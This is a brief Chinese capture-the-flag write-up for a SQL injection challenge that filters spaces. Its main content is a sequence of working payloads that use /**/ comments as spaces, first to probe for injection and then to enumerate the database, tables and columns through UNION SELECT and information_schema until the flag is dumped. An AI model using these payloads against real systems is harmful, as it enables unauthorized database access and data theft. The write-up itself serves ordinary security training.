过滤空格:
首先这题,我们得知道用/**/来代替我们语句中的空格
进行注入
首先启动环境用:
1'
1'/**/and/**/1=1#
1/**/and/**/1=1
1/**/and/**/1=2
测出是否有注入
然后就报出库名:
520/**/union/**/select/**/1,database()
在报出表名:
520/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/1
在报出字段:
520/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='llymftbncv'/**/limit/**/1
在报出内容得到flag:
520/**/union/**/select/**/1,group_concat(cjdiiibvpj)/**/from/**/sqli.llymftbncv/**/limit/**/1